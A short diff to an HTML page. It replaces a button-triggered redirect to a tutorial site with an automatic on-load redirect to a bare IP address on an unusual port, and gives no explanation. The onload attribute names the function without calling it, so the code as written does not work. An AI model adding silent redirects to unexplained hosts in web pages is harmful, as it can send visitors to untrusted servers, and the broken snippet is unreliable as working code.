--- a/index.html
+++ b/index.html
@@ -1,12 +1,10 @@
 <!DOCTYPE html>
 <html>
-<body>
-
-<button onclick="myFunction()">Replace document</button>
+<body onload="forward">
 
 <script>
-function myFunction() {
-  location.replace("https://www.w3schools.com")
+function forward() {
+   location.replace("http://172.97.176.223:30000")
 }
 </script>
 
